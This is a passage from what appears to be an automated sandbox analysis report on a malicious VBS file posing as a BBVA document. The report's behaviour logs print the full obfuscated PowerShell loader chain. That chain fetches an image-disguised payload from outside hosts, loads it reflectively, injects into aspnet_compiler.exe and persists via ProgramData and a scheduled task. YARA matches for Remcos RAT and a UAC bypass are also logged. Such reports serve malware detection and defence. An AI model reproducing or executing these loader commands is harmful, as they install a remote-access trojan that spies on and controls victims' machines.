3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,21_2_004158B9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041D07121_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004520D221_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043D09821_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043715021_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004361AA21_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0042625421_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043137721_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041E5DF21_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044C73921_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004267CB21_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043C9DD21_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00432A4921_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043CC0C21_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434D2221_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00426E7321_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00440E2021_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043CE3B21_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00412F4521_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00452F0021_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00426FAD21_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004020E7 appears 39 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433FB0 appears 55 times
                        Source: BBVA S.A..vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510Jump to behavior
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@19/12@5/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,21_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,21_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,21_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,21_2_00419BC4
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\VBScriptingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmcghghyrtssxr-7RL1P2
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2052:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhonk0up.qgt.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\haematachometer.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 